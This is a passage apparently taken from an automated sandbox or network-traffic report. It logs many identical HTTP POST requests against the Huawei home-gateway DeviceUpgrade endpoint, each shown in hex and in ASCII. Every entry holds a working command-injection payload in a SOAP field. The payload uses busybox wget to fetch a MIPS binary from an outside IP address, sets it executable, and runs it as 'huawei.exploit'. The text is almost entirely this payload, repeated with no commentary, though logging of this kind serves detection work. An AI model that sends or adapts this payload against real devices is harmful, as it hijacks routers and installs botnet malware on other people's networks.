74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 36 34 2e 32 32 31 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 33 74 33 74 33 74 33 74 33 74 33 74 33 74 33 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.64.221 -l /tmp/.unstable -r /t3t3t3t3t3t3t3t3pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 